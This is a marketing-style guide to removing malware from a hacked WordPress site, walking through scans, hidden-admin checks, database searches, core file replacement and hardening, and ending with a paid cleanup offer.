WordPress Malware Removal: Expert Guide to Clean Hacked WordPress Site

Is your WordPress site redirecting to spam? Are you seeing “403 Forbidden” errors or a blank white screen?

Stop. Don’t panic.

In my 7+ years as a Web Developer & Security Specialist, I have fixed over 4,500 hacked websites. I have seen infections that expensive security plugins completely miss—like “Ghost” plugins that don’t show up in your dashboard and hidden admin users buried deep in your database.

Why trust this guide?

Because I don’t just click “scan.” I analyze the code. Most “security experts” rely solely on automated tools. As a developer, I manually inspect your SQL database and JavaScript files to find the backdoors that bots can’t see.

The good news? It is fixable.
The bad news? Clicking “clean” on a plugin isn’t enough. You need a surgical approach.

In this guide, I will show you the exact Hybrid Method I use: starting with a scan, but finishing with deep manual cleaning.

---

Step 1: Confirm the Infection (It’s Not Just Redirects)

Malware doesn’t always look like a “Hacked by…” screen. Often, it looks like a broken server or invisible SEO spam.

Common Symptoms I See Daily:

• The “Error” Screens: You might see a 500 Internal Server Error, a 403 Forbidden message, or just a blank White Screen of Death. This is often caused by malware corrupting your .htaccess file.
• Malicious Redirects: Visitors (especially on mobile) are sent to gambling or adult sites. Read my guide on fixing mobile redirects here.
• Japanese/Gibberish Spam: Google indexes thousands of pages you never created. This is the Japanese Keyword Hack.
• Hosting Suspension: Your host (Godaddy, Bluehost, SiteGround) shuts you down for “Resource Usage” caused by a mining script.

Step 2: Lock It Down & Backup

Before you start surgery, you must stop the bleeding.

1. Change Passwords: Immediately change your Hosting (cPanel) and FTP passwords. If you can access the dashboard, change your Admin password.
2. Enable Maintenance Mode: Use a lightweight plugin like SeedProd to put up a “Under Maintenance” screen. This stops users from being redirected to malware while you work.
3. The “Clean” Backup: Take a full backup of your Files and Database.Warning: Do not restore an old backup yet. We want to clean the current site to ensure we don’t lose your recent data. Save this backup to your local computer, not the server.

Step 3: The “Hybrid” Scan (Plugin + Manual)

Most guides tell you to just run a plugin. I recommend a Hybrid Approach.

1. Run a Wordfence Scan (The Baseline)

Install Wordfence (Free version is fine) and run a scan. It is excellent at finding known malware signatures.

Crucial Tip: Note the infected files, but don’t just click “Delete” yet. If it identifies a core file like wp-load.php, deleting it will break your site. We will replace these in the next step.

2. The Manual “Ghost” Check (What Scanners Miss)

Plugins often miss sophisticated “Ghost” malware. Here is how to find them manually:

• The Plugin/Theme Count Test:
  • Go to your WordPress Dashboard > Plugins. Count how many are installed (e.g., 12).
  • Now, open your File Manager (cPanel) and go to wp-content/plugins. Count the folders.
  • The Red Flag: If you see 13 folders but only 12 plugins in the dashboard, that extra folder (often named something like wp-security-patch or cache-optimizer) is likely hidden malware. Delete it immediately.
• The Checksum Verify: If you have WP-CLI installed, run wp core verify-checksums. This compares your core files against the official WordPress repository. Any mismatch indicates a hacked file.
• The “Last Updated” Date: In File Manager, look at the “Last Modified” date of your index.php, header.php, and footer.php. If they were modified yesterday, but you haven’t updated your site in months, they contain injected code.

Step 4: Advanced Detection (Terminal & Network)

If you are a developer or have SSH access, use the power of the terminal. It is faster and more accurate than any plugin.

Grep Command for Backdoors:
Run this command to search for common obfuscated malware functions (like eval and base64_decode) inside your uploads or theme folders:

grep -rnw './wp-content/' -e 'eval('

Check the Network Tab:
Open your site in Chrome Incognito mode. Right-click > Inspect > Network Tab. Reload the page. Look for requests going to strange domains. If you see your site loading JavaScript from a random .xyz or .ru domain, that is the source of your redirect.

Step 5: Database Surgery (The Hidden Admin Trick)

This is where 90% of cleanup attempts fail. You might delete the malware files, but if the hacker has a secret Admin account, they will just log back in.

Warning: Hackers can hide users from your WordPress “Users” screen. You must check the database directly.

1. Log in to phpMyAdmin.
2. Open the wp_users table.
3. Look closely: Do you see a user named admin, 101, x00, or a strange email address? If you see a user here that does not show up in your WordPress dashboard, delete the row immediately.

Search for SEO Spam:
Click the “Search” tab in phpMyAdmin. Search your wp_posts table for:

• <script (Malicious JS injection)
• position:absolute (Hidden SEO spam text)
• display:none (Hidden links)

Hackers often hide spam links using CSS (left:-9999px) so you can’t see them, but Google can.

Step 6: Replace Core Files (The Nuclear Fix)

If Wordfence found issues in wp-admin or wp-includes, do not try to “clean” the code. Replace the files.

1. Download a fresh copy of WordPress from wordpress.org.
2. Unzip it on your computer.
3. Delete the wp-content folder from this new download (so you don’t overwrite your images/themes).
4. Upload the remaining files (wp-admin, wp-includes, and root files) to your server via FTP, selecting “Overwrite”.

This guarantees that your core system files are 100% clean and original.

Step 7: Post-Cleanup Hardening

Once the malware is gone, you must lock the door so they can’t get back in.

• Update Security Salts: Go to the WordPress Salt Generator. Copy the code and replace the matching lines in your wp-config.php file. This instantly logs out all users (including hackers).
• Disable File Editing: Add this line to your wp-config.php file to stop hackers from editing files via the dashboard:define('DISALLOW_FILE_EDIT', true);
• Deep Cache Purge: Clear your server cache (LSCache/Varnish), your CDN (Cloudflare), and your browser cache. Malware often “lives” in the cache even after you fix the file.
• Remove Blacklists: If you see a red screen, go to Google Search Console > Security & Manual Actions and click “Request Review.” Read my full guide on Blacklist Removal here.

---

Need Help? (The Expert Route)

If you’ve tried these steps and the malware keeps coming back, or if the idea of editing phpMyAdmin scares you, don’t risk breaking your site further.

I have cleaned 4,500+ sites with a 100% success rate. I don’t use automated “quick fixes.” I perform the deep, manual cleaning described in this guide to ensure your site stays clean.

👉 Click Here to Fix Your Hacked Site (Starts at $89)